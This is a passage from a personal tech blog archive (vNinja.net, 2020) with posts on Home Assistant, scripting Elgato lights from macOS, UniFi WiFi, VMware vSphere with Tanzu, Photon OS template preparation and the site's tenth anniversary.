Tibber — Provides real time power consumption and price information from my power provider Google Cast — I have a Chromecast connected to an older TV in the basement. Google Calendar Event — Use Google Calendar events as binary triggers HACS — Home Assistant Community Store There are a few others installed as well, but these are the main ones I actively use. Home Assistant Add-ons # Node-RED — Automation workflow tool, preconfigured with HA integration Terminal & SSH — Enables Terminal and SSH access to the HA instance directly from HA itself Visual Studio Code — Visual Studio Code, directly in your browser while accessing HA. Preconfigured with HA integration, including autocompletion Examples of automations I have running # Light color changes for calendar based events Automatically turn on or off Sonos Night Mode Automatically brew a pot of fresh coffee every morning Automatically turn off the coffee machine after 30 minutes (regardless of whether it’s powered on manually or via an automation) Sunrise / Sunset lighting on / off Motion sensor triggered lights in the basement/bar area (triggers and lights from different ecosystems) These automations are all pretty simple, as I’m really a novice when it comes to building automations in Node-RED, but they should be good examples for starter automations. I am sure this will be expanded throughout 2021, as I am really just starting to dip my toes into the possibilities of this setup. At the moment, my Home Assistant Lovelace dashboards are a mess, and not very useful. I need to spend some time on reorganizing and decluttering them as well, but for now the main focus has been on automation. Perhaps I’ll do a series on Lovelace dashboards later on, once I get my Home Assistant house in order.
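As a hedged aside, the 30-minute coffee-machine auto-off from the list above could also be expressed as a native Home Assistant automation rather than a Node-RED flow. This is a minimal sketch of my own, assuming a hypothetical switch.coffee_maker entity; the actual implementation in this setup lives in Node-RED and may differ:

```yaml
# Sketch only: switch.coffee_maker is a hypothetical entity id.
automation:
  - alias: "Coffee maker auto-off"
    trigger:
      # Fires once the outlet has been on for 30 minutes,
      # no matter how it was turned on
      - platform: state
        entity_id: switch.coffee_maker
        to: "on"
        for: "00:30:00"
    action:
      - service: switch.turn_off
        entity_id: switch.coffee_maker
```

The `for:` option on the state trigger is what makes this work regardless of whether the outlet was switched on manually or by the morning schedule.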
--- # Forward Looking Statements: 2021 Edition URL: https://vNinja.net/2020/12/07/forward-looking-statements-2021/ Date: 2020-12-07 Author: christian Tags: 2021, Plans, Review, Personal Misleading title, I know, especially considering most of this post is actually looking back at 2020. It has been a few years since I did one of these posts, but with the havoc of 2020 close to being firmly in the rearview mirror (the year, that is; I am under no illusion that the effects of 2020 are behind us), why not try to pick it up again? Since I didn’t post a list of goals for 2020, it’s hard to review it item by item, but it’s safe to say that 2020 has been one hell of a year. A lot of people have been much more adversely affected by the whole COVID-19 pandemic than I have, but being confined to the Home Office of Isolation™ since March has taken its toll, at least mentally. I’m lucky enough to have my own dedicated office, grown kids who don’t need home schooling, and an employer who facilitates, and embraces, remote work. I know not everyone has that luxury, given their roles, but for those of us who do, it is a blessing. 2020 has also shown us who the real heroes are: the front line workers who can’t do their jobs from a comfortable and safe home office. Health care workers, teachers, public transport and shop workers, and others who provide crucial services. On behalf of us lucky ones, thank you for being there. Thank you for caring, and thank you for making it possible for the rest of us to continue working. Hopefully 2021 will be better, at least eventually, as the vaccines become available and we can start to slowly return to a new kind of normal. 2020 has proven one thing though, and that is that working from home works, for those who have jobs that allow it.
The last year has also opened a few customers' eyes to the opportunities provided by remote work, and I anticipate that my own travel requirements will be reduced considerably in the future, as a direct result of 2020 being the very definition of annus horribilis. Naturally, events like VMworld were online-only this year, and I suspect that will be the case at least in 2021 as well—if not even longer. Who in their right mind wants the liability of gathering 10-20k people in a single location in 2021? Doing these kinds of events online simply isn't the same, in any way, and that is pretty sad. The same goes for VMUG events, even if we did have a great Nordic online event in 2020. I think this is what I've missed most this year, the physical conference experience. Well, that, and actually being able to attend private events, like concerts and the like. Oh my, I miss concerts. In the meantime: wear a damn mask and socially distance, won't you? All things considered, 2020 has probably been one of my busiest years to date. I moved into a new role as Chief Technologist SDDC last April, which basically translates to Lead Architect on any SDDC project we come across, as well as having the Technical Lead role for our team of SDDC consultants. This also means that I'm involved much earlier in projects than before, and often as a lead in customer engagements. It's been very interesting, as it's a move away from being a pure architect/consultant to a more pre-sales and high-level resource, in what is essentially the Office of the CTO. I have to say, I do enjoy the change! For us, 2020 has been an incredible year with some really exciting projects for some high-profile clients. This is especially true with regards to VMware Cloud Foundation, which seems to be gaining some real traction here in Norway. In short, we're nearing capacity on the consultants we have available, and we need to grow the team in 2021. As far as vNinja.net goes, 2020 has been a mixed bag.
On the plus side, the site turned 10 years old in 2020, and this is the 26th post of the year. Not too shabby on the content side, really. I'm surprised the post count is that high. On the negative side, I have neglected the look and feel of the site for quite some time, mostly due to my lack of inspiration (I have done a lot of work on the back end of things, though that's not really visible), but I'll try to redesign at least parts of it in 2021. 2020 was the year I contributed to a book again, writing one of the chapters in IT Architect Series: Stories from the Field, Vol. 1, as well as contributing as an editor for a number of the other chapters in the book. For a forward-looking post, that's more than enough retrospection; let's look forward instead, as I think we all need to do that right about now. Here is my attempt at setting some goals for 2021, if the world doesn't completely implode, that is. Forward Looking Statements: 2021 Edition # Professional Goals #

- Continue to grow the Proact SDDC practice in Norway — The past four years have been fun, and there is no reason why that shouldn't continue into 2021. As mentioned above, we're in need of more resources in the SDDC team, and growing the team will be one of my main priorities in 2021.
- Tanzu / Kubernetes — Some might say I'm a bit behind the curve on this, but I feel like we're at a tipping point right now where all existing vAdmins and vArchitects need to take this new world seriously. As an architect I need to educate myself on how this affects the designs we're creating for customers. This naturally ties into the adoption we're seeing with VMware Cloud Foundation as well.
- Upgrade Home Lab — I have been without a proper home lab for a couple of years now, and since we have a rather beefy lab at work, it hasn't been that much of a problem. However, new requirements pop up from time to time, and it would be nice to have a small lab at home to do quick lab work in.
I have a few specific projects in mind that my old one-node Dell workstation simply doesn't have the resources for; hopefully I can get this sorted early in 2021 and start developing my evil plans. Naturally, this ties in with the item above regarding Tanzu / Kubernetes.

- Redesign vNinja.net — Not sure if this should be in the Professional or Personal list, but the site needs some TLC and design updates, as it has mostly stayed unchanged since I switched to Hugo in 2018.

Certifications # Since I work for a VMware partner, there are some requirements that we need to fulfill, and some of those naturally end up on my desk.

- VMware Certified Master Specialist - HCI — This one is at the top of my list, as we're part of the VMware Ignite Practice Boost program for HCI.
- VMware SME Program — Be more active in the VMware SME program. I didn't partake in it much in 2020 and would like to rectify that in 2021.

Personal Goals #

- Guitar — Learn to play some guitar. Note, not master, but being able to play some. Perhaps even a whole song?! This has been on my unofficial goal list for years and years, but for some reason you don't really get good at something without actually practicing. Who knew?
- Photography — Get back into the groove of taking photos, regularly. I've been slacking on this for way too long, and I don't really know why. This was also on my list for 2017, so it's not new. I have enough equipment to start my own portrait studio (studio strobes, remote triggers, softboxes, reflectors, etc.) should I want to, so I'd better make use of it in 2021.
- Home Assistant — I want to utilize Home Assistant even more than I do now. I have a setup that works pretty well as-is, tying a bunch of different things together, but there is a lot of untapped potential that I look forward to exploring. Integrating Node-RED seems to be a natural way to go.

There it is, my personal recap of the hell that has been 2020, and my goals for 2021.
The goals might not be the most ambitious of all time, but then again, who knows what curveballs 2021 will throw at us. At least they're somewhat achievable, and that has to be a good starting point. If 2020 has taught us anything, it's that anything can happen. At any time. Let's all hope for a better future, starting now. --- # Automating Elgato Key Lights From macOS Touch Bar URL: https://vNinja.net/2020/12/04/automating-elgato-key-lights-from-touch-bar/ Date: 2020-12-04 Author: christian Tags: elgato, macOS, Automator Since I recently got an Elgato Key Light Air for the Home Office of Isolation™, I've been playing around with how to automate it. I've seen a lot of people using Elgato Stream Decks for automating these lights, but I don't really have the need for a dedicated device for this. At least not yet. As it turns out, it's actually pretty easy to automate these lights via other means. The light itself runs an HTTP server on port 9123, and via /elgato/lights it's possible to connect to its internal API for remote control. There is even a Postman Collection available, which makes it very easy to get started with connecting and changing settings around. Since Postman also allows you to export your API calls as a curl command, building the query in Postman is very handy. Once I had two working commands, one for turning the light on with my preferred settings, and one for turning it off, I saved those as two different shell scripts: elgato-on.sh # This script turns the light on, sets the brightness to 10 and the temperature to 162. Pretty straightforward. elgato-off.sh # This script is even simpler; it just turns the light off. If you decide to use these, be sure to replace <your lights ip> with your Elgato light's actual IP address on your own network. All this is well and fine, and running these scripts does the job nicely.
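Each script boils down to a single HTTP call. As a minimal sketch, assuming the Key Light's /elgato/lights endpoint accepts a PUT with on, brightness, and temperature fields in the payload (the payload helper and LIGHT_IP variable are my own construction, not from the original scripts), elgato-on.sh could look something like this:

```shell
#!/bin/sh
# Sketch of elgato-on.sh. <your lights ip> is the placeholder from the post;
# the JSON field names (on, brightness, temperature) are assumptions based
# on the Key Light's HTTP API on port 9123.
LIGHT_IP="${LIGHT_IP:-<your lights ip>}"

# Build the request body: on=1 turns the light on; brightness 10 and
# temperature 162 match the settings mentioned in the post.
payload() {
  printf '{"numberOfLights":1,"lights":[{"on":%s,"brightness":10,"temperature":162}]}' "$1"
}

case "$LIGHT_IP" in
  "<your lights ip>")
    echo "Set LIGHT_IP to your light's actual IP address first" >&2
    ;;
  *)
    # elgato-off.sh would be identical, but send "$(payload 0)" instead.
    curl -s -X PUT "http://${LIGHT_IP}:9123/elgato/lights" \
      -H "Content-Type: application/json" \
      -d "$(payload 1)"
    ;;
esac
```

Run it as `LIGHT_IP=192.168.1.50 ./elgato-on.sh` (with your light's address); splitting out the payload builder just makes it easy to reuse the same script shape for the off variant.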
Using iCanHazShortcut, I have added keyboard shortcuts for triggering them: But then it dawned on me: my MacBook has this pretty Touch Bar that seldom gets any love, or usage for that matter. There had to be a way of creating something for this there as well, right? Turns out there is, and it's actually pretty simple to add your own actions to the macOS Touch Bar. Adding Custom Quick Actions to the macOS Touch Bar #

1. First off, open System Preferences -> Keyboard -> Customize Control Strip and drag the Quick Actions button to your Touch Bar
2. Create a Quick Action in Automator
3. Find Run Shell Script and double-click it
4. Set Workflow receives to no input and put the details for your script in the Run Shell Script window
5. Set the color you want to have for your Touch Bar button and save the Quick Action with your preferred name; I used Key Light On and Key Light Off for mine

Repeat steps 1-5 for the second script. Once saved, they should appear under the Quick Actions button on the Touch Bar (added in step 1). Now I can control turning the light on and off, both from my Touch Bar and via keyboard shortcuts! --- # Using VMware Validated Design Stencils in Draw.io URL: https://vNinja.net/2020/11/30/using-vmware-vvd-stencils-in-draw.io/ Date: 2020-11-30 Author: christian Tags: VMware, VVD, VMware Validated Design, Diagram Ryan Johnson, who works on VMware Validated Design, has created a GitHub repository for VMware stencils. The repository contains the stencils used for VMware Validated Designs in SVG, Visio and OmniGraffle formats, as well as a very nice PowerPoint presentation that shows how to use the stencils. Great work Ryan, and team, and thanks for making these available! But since I mostly use diagrams.net these days, I figured I'd try to import these and see if they work there as well. I had no success actually importing the files by going to File->Import, but it turns out there is an even easier way to import the Visio *.vssx files.
All it takes is simply downloading the files from the GitHub repository, and dragging and dropping them into the web app, or the desktop app, for them to show up ready for use in your design diagrams! Once they're added, you'll find two new shape folders on the left-hand side, named vmw_Icons.vssx and vmw_colors.vssx. These can be renamed to whatever you want, to make them easier to identify. Also, in case you were unaware, diagrams.net already includes some of the VMware Validated Design stencils by default, but not the complete set. You can find the included ones by clicking +More Shapes… in the bottom left, scrolling down to VMware under Networking and adding them. --- # Issues Connecting Elgato Key Light Air to Ubiquiti UniFi Wireless Networks URL: https://vNinja.net/2020/11/30/issues-connecting-elgato-key-light-air-to-ubiquiti-unifi-wireless-networks/ Date: 2020-11-30 Author: christian Tags: networking, ubiquiti, USG, UniFi, WiFi, elgato I recently bought an Elgato Key Light Air for use in the home office, since most of my time is spent in online meetings these days. We've also recently started recording some Proact videos, and proper lighting is key (pun intended). I've been working from home, pretty much exclusively, since March, and proper lighting hasn't really been an issue. I'm lucky enough that my home office has two large windows, located directly behind my screen, so natural lighting has been plentiful. Fast forward to the end of November, and natural light is no longer in abundance here in Norway. I've been able to work around it with a couple of Philips Hue Go lamps, but those really work better as accent lighting, as it's hard to place them anywhere other than directly on the desk itself. Happily, I ordered the Elgato Key Light Air, as that should provide the light I was lacking. Assembling and connecting it was very easy, but when it came to adding it to my home WiFi I ran into some unexpected issues.
As is customary with this kind of IoT-ish device, the setup is to connect to its own WiFi through a management app, in this case the Elgato Control Center, and then use that to connect it to the WiFi of your choice. For the life of me, I couldn't get the Key Light to connect to my home WiFi; it just timed out with an unexpected error—which is very unhelpful. A quick Google search led me to Key Light – What network types are compatible? which clearly states that the supported wireless frequency is 2.4 GHz. My home network, based on Ubiquiti UniFi, runs in both 2.4 GHz and 5 GHz mode and should be compatible. I did have a suspicion, though, that the dual-band WiFi setup was the culprit, and decided to create a new SSID, lock it to 2.4 GHz, and see if that fixed the connection issue, and of course, it did. While that did fix the initial connection issue, and enabled control of the Key Light from the app on my phone, I didn't want to have a separate SSID just for this device, nor did I want to downgrade my home network to only run on the 2.4 GHz band. So, now what? Turns out, the solution was pretty simple. All I had to do was momentarily remove the 5 GHz band from my home WiFi, connect the light while only 2.4 GHz was available, and then re-enable dual-band WiFi after the connection had been made. How to edit UniFi WiFi band selection #

1. Log into the UniFi controller, and go to Settings (the gear icon at the bottom left)
2. Choose WiFi, and hover over the SSID you want to edit
3. Click edit, and then expand the Advanced section

I changed it to 2.4 GHz, let the controller provision the settings to my APs, used the Elgato Control Center to connect the Key Light Air to my now 2.4 GHz-only WiFi, and once the setup was successful I re-enabled the Both (2.4 & 5 GHz) setting for my SSID. So far that's been working perfectly, with no issues controlling the light even after changing the network settings back after initial configuration.
--- # vExpert 2021 Applications are now Open! URL: https://vNinja.net/2020/11/24/vexpert-2021.md/ Date: 2020-11-24 Author: christian Tags: vExpert, VMware In case you weren't aware, applications for VMware vExpert 2021 are now open. See the official announcement for details. Applications are open until January 9th 2021, and the announcement of the class of 2021 is scheduled for February 19th 2021. The VMware vExpert program is VMware's global evangelism and advocacy program. The program is designed to put VMware's marketing resources towards your advocacy efforts. Promotion of your articles, exposure at our global events, co-op advertising, traffic analysis, and early access to beta programs and VMware's roadmap. The awards are for individuals, not companies, and last for one year. Employees of both customers and partners can receive the awards. In the application, we consider various community activities from the previous year as well as the current year's (only for 2nd half applications) activities in determining who gets awards. We look to see that not only were you active but are still active in the path you chose to apply for. – https://vexpert.vmware.com/ I'm lucky enough to be one of the vExpert Pros, so feel free to reach out if you have any questions about the program or the application process itself—I'd be happy to help out in any way I can! Don't hesitate: reach out to your local vExpert Pro, or submit your vExpert application now. --- # macOS: Aggregate Device for Teams - Fixing Auto-Adjusting Mic Level URL: https://vNinja.net/2020/11/06/macos-aggregate-device-for-teams.md/ Date: 2020-11-06 Author: christian Tags: macOS, Audio, Teams After working well for many, many months, my external mic, a Blue Yeti, suddenly started having issues in Microsoft Teams on macOS. The issue was isolated to Teams; other video and audio solutions worked fine.
For some reason, Teams had decided to start auto-adjusting the input level on its own, rendering it pretty useless. Some might say it's a blessing that I get auto-muted, seemingly at random, but for me at least it's pretty annoying. Changing to the internal mic in my MacBook did the trick, but that's not really a solution when you have a proper external microphone! According to Microsoft Teams UserVoice, lots of people are having issues with this, so hopefully a real fix for this issue is on its way. Bjoern Brundert also tweeted about the issue, and how he solved it with a virtual microphone device, which got me thinking it should be possible to do this with built-in macOS tools as well. Turns out, you can! Creating a Virtual Aggregate Microphone Device in macOS #

1. Start Audio MIDI Setup from Applications->Utilities. This will show the available audio devices, both input and output.
2. Click on the small + on the bottom left, and select Create Aggregate Device.
3. Select the inputs you want to include in the aggregate device group; here I selected my Yeti.
4. Rename the aggregate device to something that makes sense to you, by clicking its name.
5. Restart Teams, if it's already running, to make the new device available, and switch to the newly created aggregate device as your input source!

That's it! Turns out Microsoft Teams does not auto-adjust the levels on virtual devices like this, so you'll still be able to use your external microphone simply by putting it into an Aggregate Device, without needing any 3rd-party software. Now all we have to do is wait for Microsoft to actually fix the issue, so we don't have to rely on workarounds like this to be able to use our equipment. --- # VMworld 2020: vCommunity Discord URL: https://vNinja.net/2020/09/24/vmworld-2020-vcommunity/ Date: 2020-09-24 Author: christian Tags: VMworld, VMware, VMworld 2020, Orbital Jigsaw VMworld 2020 is soon upon us, and due to the current world situation it's an online-only event this year.
Personally I think this is a big loss, mostly because I usually spend most of my time at VMworld networking and speaking to people I often only see once a year, something that simply will not happen this year. In fact, I usually spend more time in the Blogger / Community Lounge than I do in sessions. There are many reasons for this, but the main one is that I'm kind of a social being. Now the physical aspect of VMworld 2020 has been taken away, and the entire conference is a streamed event, which really bums me out. While I am sure the content will be as good, or perhaps even better, than it usually is, the whole conference experience has been removed from the equation. One of the things that I really enjoy about attending VMworld is the fact that I'm physically there, which makes it easier to focus. This time around, it'll be more of a "yet another day or two in the home office"™-style event, which frankly is getting a bit tiresome. Thankfully Nick Howell and Jeramiah Dooley have taken the baton, and have tried to recreate, or even re-invent, some of the social aspects of the conference experience on Discord. While I'm under no illusion that this will replace a physical event, it's nice to see community members step up and try to offer an alternative to the famed hallway track. Community is hard. Community has been something that vendors of all shapes and sizes have managed with varying degrees of success at conferences, and we think that, especially with the pandemic, we can build the infrastructure that makes community easier to organize and coordinate. Orbital Jigsaw is the virtual conference center: it's a place people gather, a place where discussions happen, a place where people put context to the content. It has rooms for content, rooms for discussion, rooms for play, whatever the community needs. Video, audio, text, links to collateral, places to talk shop with partners, all in one place, and all consistent from conference to conference.
– Jeramiah Dooley It will be interesting to see how this works out in reality. Like many things right now, things are a bit of an experiment and we need to adapt and overcome somehow. I’ll be hanging around Orbital Jigsaw as much as time permits during VMworld, perhaps I’ll see you there? For more details, see Jeremiah’s posts VMworld 2020: Time for Community to Shine Community VMworld 2020: Time to Volunteer! --- # Photon OS 3.0 Template Gotcha URL: https://vNinja.net/2020/09/23/photon-os-30-template-gotcha/ Date: 2020-09-23 Author: Tags: vSphere, Photon, Template Photon OS is VMware’s minimal Linux distribution, and in a small project in the lab I thought I should use it for some small lightweight Veeam Backup & Replication v10 Linux proxies. After deploying it, and converting it to a template, I ran into some very frustrating authentication issues after deployment. To make a very long troubleshooting story short, I forgot to ensure that a new unique machine-id was created, wrecking havoc with, amongst other things, the DHCP server assignments. From the machine-id man page # The /etc/machine-id file contains the unique machine ID of the local system that is set during installation or boot. The machine ID is a single newline-terminated, hexadecimal, 32-character, lowercase ID. When decoded from hexadecimal, this corresponds to a 16-byte/128-bit value. This ID may not be all zeros. So remember, if you want to use Photon OS (and many other Linux distributions) as a template in vSphere, make sure the last command you run before shutting down and converting to a template, forces generation of a new machine-id. The quickest way I thought of forcing this, is to run the following command: echo -n > /etc/machine-id This simply overwrites the /etc/machine-id file with a new empty one, forcing a new machine-id to be generated at the next boot. 
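As a sketch, the one-liner could be wrapped in a tiny helper so the behavior can be exercised against a scratch directory before pointing it at the real root filesystem (the reset_machine_id name and its root parameter are my own construction, not from the post):

```shell
#!/bin/sh
# reset_machine_id is a hypothetical wrapper around the machine-id reset.
# Pass the filesystem root to operate on; use "/" for the real thing, run
# as root as the last step before shutting down and converting to a template.
reset_machine_id() {
  root="${1%/}"
  # An empty /etc/machine-id makes systemd generate a fresh ID on next boot.
  # ": >" truncates the file, same effect as the post's echo -n redirect.
  : > "${root}/etc/machine-id"
}

# Real use, right before shutdown:
#   reset_machine_id /
```

The parameterized root makes it trivial to verify the truncation against a throwaway directory first, which is cheap insurance before baking it into a template-prep step.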
This is not a Photon OS-specific issue as such, more a general Linux (and FreeBSD) one, but it was in Photon OS that it came back to bite me. In many regards it's akin to not forcing a new Security ID (SID) to be created for cloned Windows VMs, which also causes all sorts of problems, especially for domain-joined machines. --- # VMworld 2020: vTrail Map URL: https://vNinja.net/2020/09/22/vtrailmap2020/ Date: 2020-09-22 Author: christian Tags: VMworld, VMware, VMworld 2020 vTrail Map by Yadin Porter de León and the Level Up Project is usually a physical resource that gets handed out at VMworld. Since the world is pretty much in lockdown, and VMworld is a virtual-only conference this year, the vTrail Map 2020 has been transformed into an online resource and experience! In short, vTrail Map is a community guide for the virtualization community. As I'm lucky enough to be a vTrail Map Champion for VMworld 2020, it's really fun to announce that the first virtual vTrail Map is now live! This year's edition is sponsored by Veeam, and the team behind it has really gone above and beyond to create something really unique: think Habbo Hotel meets Where's Waldo! vTrail Map 2020 # Go explore the virtual environment, look around for fun Easter eggs, and see if you can recognize anyone! There is even a role-playing adventure game coming later! --- # IT Architect Series: Stories From the Field, Vol. 1 URL: https://vNinja.net/2020/09/21/it-architect-series-stories-from-the-field-vol1/ Date: 2020-09-21 Author: christian Tags: Recommended, Reading, Books A new book, the fourth in the series, from the crew behind the IT Architect series of books has finally been released: IT Architect Series: Stories From the Field, Vol. 1. Synopsis # What is it like to be engaged on an IT project when it turns into a horror story?!
Thirty-five prominent IT professionals describe their most challenging datacenter projects and provide insights into why failures occurred, including lessons learned and what they would do differently. Recommended reading for members of the IT community who deliver IT solutions in the field and want to avoid learning the hard way… I have been fortunate enough to contribute one of the chapters in this book, alongside quite an all-star list of a total of thirty-five contributors. I have also contributed as an editor for quite a few of the stories. In my opinion, this is another must-have book for all aspiring and existing IT infrastructure architects, and it fits in really well with the previously released books in the IT Architect Series. Since the book highlights failures in IT projects, and the lessons learned, all stories have been anonymized, and which author contributed which story is left as a guessing exercise for the readers. Each of the stories highlights potential pitfalls and paths to resolving issues that might arise in IT architecture projects, as well as providing some background into why something failed. I am sure this will be a very useful resource for many, as well as provide real-world learning based on real projects. Contributors # The list of contributors is quite a list, and I'm honored to be amongst them! Abdullah Abdullah, Johan van Amersfoort, John Yani Arrasjid, Steve Athanas, Marco van Baggum, René van den Bedem, Doug Baer, Daemon Behr, Hans Bernhardt, Michael Berthiaume, Jayson Block, Wayne Conrad, Paul Cradduck, Sachin Dharmadhikari, Tony Foster, Mark Gabryjelski, Faisal Hasan, Ray Heffer, John Kozej, Christopher Kusek, Sean Massey, Wences Michel, Christian Mohn, Geoffrey O'Brien, Josh Odgers, David Quinney, Bas Raayman, Yves Sandfort, Rachit Srivastava, Jorge Torres, Raman Veeramraju, Matthew Wood, Szymon Ziolkowski, Chip Zoller.
Details # Associate editor: Mark Gabryjelski Cover design or artwork by: Ioannis Dangerous Age Editor-in-chief: Matthew Wood Managing editor: John Yani Arrasjid Paperback: 291 pages Language: English Announcement: ITA Series – Book 4 Releases Order your copy today! # --- # VMware Announcements September 2020 — The Resource List URL: https://vNinja.net/2020/09/15/vmware-announcements-september2020/ Date: 2020-09-15 Author: christian Tags: vSphere, VMware, Kubernetes, Tanzu, vSAN, VCF Today saw a bunch of announcements from VMware, including vSphere 7.0 Update 1, vSAN 7.0 Update 1, and VMware Cloud Foundation 4.1, and I thought it might be useful to post a list of some of the resources that have been published. General Resources # A new home for VMware Technical Content: VMware Core Tech Zone VMware Announcements # Announcing VMware vSphere with Tanzu: The Fastest Way to Get Started with Kubernetes What's New with VMware vSphere 7 Update 1 vSphere 7 Update 1 – AMD SEV-ES What's New with VMware Cloud Foundation 4.1 What's New in vSAN 7 Update 1 Announcing vSAN Data Persistence Platform VMware Videos # A Quick Look at What's New in vSphere 7 Update 1 # What's New in vSAN 7.0 Update 1 # Demo Videos by Duncan Epping # vSAN 7.0 Update 1 new feature: IO Insight # vSAN 7.0 Update 1 new feature: vSAN HCI Mesh aka Datastore Sharing # vSAN 7.0 Update 1 delivers compression only and capacity rebuild reservations # Community Resources # Quite a few vCommunity members have posted their announcement posts and thoughts as well. I'm sure some are missing from this list, but I'll update it as time goes on. All About vSphere 7 U1 Features by Melissa Palmer What's New in vSAN 7 Update 1? The Important Bits by Ather Beg What's New in vSphere 7 Update 1? The Important Bits by Ather Beg What is new in vSphere 7 U1, vSAN 7U1 and VCF 4.1 by Kim Bottu VMware vSphere 7.0 Update 1 – What's coming soon?
by Graham Baker VMware vSAN 7.0 Update 1 – All the new features by Graham Baker Introducing VMware vSphere and vSAN 7 Update 1 and VCF 4.1 by Bryan van Eeden VMware vSphere 7 Update 1 vSAN 7 Update 1 VCF 4.1 Announced New Features by Brandon Lee Scaling without Compromise with vSAN HCI Mesh and VCF Remote Clusters by Bhavin Shah vSAN 7.0U1 – What's new? by Cormac Hogan What's new for vSAN 7.0 U1!? by Duncan Epping --- # VMware vSphere 7 Update 1 With Tanzu News URL: https://vNinja.net/2020/09/15/vmware-vsphere7-with-tanzu/ Date: 2020-09-15 Author: christian Tags: vSphere, VMware, Kubernetes, Tanzu VMware has announced the upcoming vSphere 7 Update 1 release, with some very welcome news for everyone who wants to run Kubernetes in their VMware estate. Previously, the only way to get vSphere with Kubernetes was to run it in VMware Cloud Foundation. With this new update, that is no longer the case! vSphere with Tanzu Overview vSphere with Tanzu (not vSphere with Kubernetes) is offered as a drop-in to an existing vSphere 7 Update 1 installation. The feature is enabled through a wizard that guides you through the setup. Since it can use a vSphere Distributed Switch, there is no NSX requirement to enable it. Of course, it can use features in NSX if that is available, and some features might only be available if NSX is present (like the vSphere Pod Service), but a basic installation only requires a VDS with three port groups: Management, Frontend, and Workload. The install wizard creates the Kubernetes control plane nodes on vSphere, and connects them to the management and workload networks. The embedded Kubernetes control plane then exposes a set of services, including the Tanzu Kubernetes Grid Service for vSphere. The TKG Service gives developers access to upstream-aligned, fully conformant Kubernetes clusters, right inside your existing vSphere 7 infrastructure. You even get a choice of which load balancer to use, including HAProxy.
With this move, VMware has not only addressed the VMware Cloud Foundation requirement for getting started with running modern applications on vSphere, but since there is no requirement for NSX or even vSAN for this to work, the basic entry point has been dramatically lowered. This is basically Kubernetes infrastructure on vSphere, with your choice of networking, storage, and load-balancing solutions! In fact, you can enable it and run a standard VMware trial of 60 days, without requiring a license, just to dip your toes in the water. From what I gather, the licensing is also simplified, and vSphere with Tanzu is a per-socket license like vSphere itself. vSphere Enterprise Plus licensing is required to enable the feature. Credit where credit is due: I think this is really great news! It addresses all my previous concerns about the scale of investment needed, and with the reduced requirements this makes it feasible for many customers to gain experience with running Kubernetes workloads alongside their existing VMs. VMware's messaging on this is (finally) simplified, and makes sense. VCF with Tanzu is the best way to run Kubernetes workloads at scale, and vSphere with Tanzu is the fastest way to get started. Updates, 15 September 2020 # The release date had not been announced at first, but it looked like it might be sooner rather than later, and well before the end of the year — remember, VMworld 2020 is right around the corner as well. In the announcement at the VMUG Virtual UserCon in Boston on the 15th of September, Lee Caswell, VP of Storage and Availability at VMware, confirmed the release date as the 6th of October 2020. I would also expect that we will see new packaging and Tanzu feature editions in the future, as it seems VMware has finally gotten its story around PKS, Project Pacific, the Tanzu portfolio, and Kubernetes straightened out and clarified.
Simplify Your Approach to Application Modernization with 4 Simple Editions for the Tanzu Portfolio indeed announces Tanzu Editions: Basic, Standard, Advanced and Enterprise. Basic and Standard will be available this quarter. Other Resources # What's New with VMware vSphere 7 Update 1 Getting started with vSphere with Tanzu by Cormac Hogan vSphere with Tanzu Whiteboard Video # --- # vNinja 10 Years URL: https://vNinja.net/2020/07/21/vninja-10-years/ Date: 2020-07-21 Author: christian Tags: vninja, site, news July 21st marks the 10th anniversary of vNinja.net! # 3654 days. 120 months. 10 years. 2010 to 2020. A decade. That is a long time. A lot has changed in these 10 years, and looking back at my first post on this site makes that very evident — the name even changed, pre-launch! The original name was vmaware, and I even had the domain registered and configured, but before I made the site live I found out someone else was already using that name, albeit under a different TLD. Luckily I caught it (rookie mistake on my part, I know) before I launched the site, and changed it to vNinja instead. vNinja.net was powered by WordPress from the start, until I moved it over to Hugo in 2018 — incidentally, almost to the day eight years after going live, so this also marks two years of running Hugo as the site generator. If I had noticed at the time, I would have postponed the switch a couple of days to have them aligned. Clearly the focus has been more on virtualization, and specifically the VMware suite of products, than on any other technology I mentioned in my first post, but like everything else in life, it evolves. Who knows what is going to change in the next ten years? I sure don't, so I won't be making any predictions.
Content Statistics # Ten years online has resulted in a bit of content, and a quick line and word count resulted in the following raw statistics: Total number of posts: 357 (~ ls -la | wc -l) Total number of lines: 18.742 (~ cat * | wc -l) Total number of words: 136.548 (~ cat * | wc -w) A “novel length” book is usually between 70.000 and 110.000 words, so I guess I’ve published enough content to go beyond that definition. It’s even closing in on two short novels, in total. Not that I think any of the stuff I’ve published here should ever really be found in print, but it’s still fun to think about. As far as traffic goes, I don’t really keep track of it, so I wouldn’t know how many hits or pageviews the site has had over the years. It’s been a bit, that much I can say. Guest Authors and Posts # Over the years, there have been a total of four guest authors, providing a total of five posts: Posts by Ed Czerwin 17th Jul 2011 SMB Shared Storage Smackdown - Part 1 NFS Performance Posts by Shane Williford 13th Aug 2015 HP Proliant DL380p Gen8 “Decompressed MD5” error Posts by Espen Ødegaard 10th Nov 2015 vCenter / SSO unable to retrieve AD-information | Error while extracting local SSO users Posts by Bjørn A. Jørgensen 9th Jan 2018 The Curious Case of the Intel Microcode 14th Jan 2018 The Curious Case of the Intel Microcode Part #2 - It Gets Better — Then Worse Huge thanks to everyone who has actually read some, or all of it, over the years — it’s much appreciated! --- # macOS: Hiding Menu Bar Icons With Dozer URL: https://vNinja.net/2020/05/27/macos-hiding-menu-bar-icons-with-dozer/ Date: 2020-05-27 Author: christian Tags: macOS The macOS Menu Bar tends to get cluttered over time, as applications really like to put an icon up there for some reason. I’m aware that you can remove most of them by dragging the icon away from the menu bar while holding down command (⌘), but sometimes the icons are useful when you need them. 
They just don’t have to be in your face all the time. A simple solution is to install Dozer — a small, free utility that allows you to hide pretty much everything besides the battery meter, the time and the icon for the Notification Center, while at the same time making it easy to show the ones I’ve decided to keep there for quick access. I’ve pretty much hidden everything now, look how neat this is! Since many of us are working from home, via video, and often end up sharing a desktop or application to show something, hiding all those status bar icons also makes sense from that perspective — in the same sense that I have turned off almost all notifications. Why something like this isn’t built into macOS is beyond me, but at least there is an easy-to-use, and free, solution to Menu Bar icon sprawl! Download Dozer from GitHub or, if you use Homebrew, install it via cask: ~ brew cask install dozer --- # macOS: Split Tunnel L2TP VPN Routing URL: https://vNinja.net/2020/05/27/macos-split-tunnel-vpn-routing/ Date: 2020-05-27 Author: christian Tags: macOS, VPN, Networking I use my Ubiquiti USG for Remote User VPN Using L2TP, but L2TP does not provide routing information to the client, so I needed a way to automatically create routes when the VPN connection fires. Thankfully, this is pretty easy in macOS (and Linux). The /etc/ppp/ip-up file, if present, triggers every time a PPP 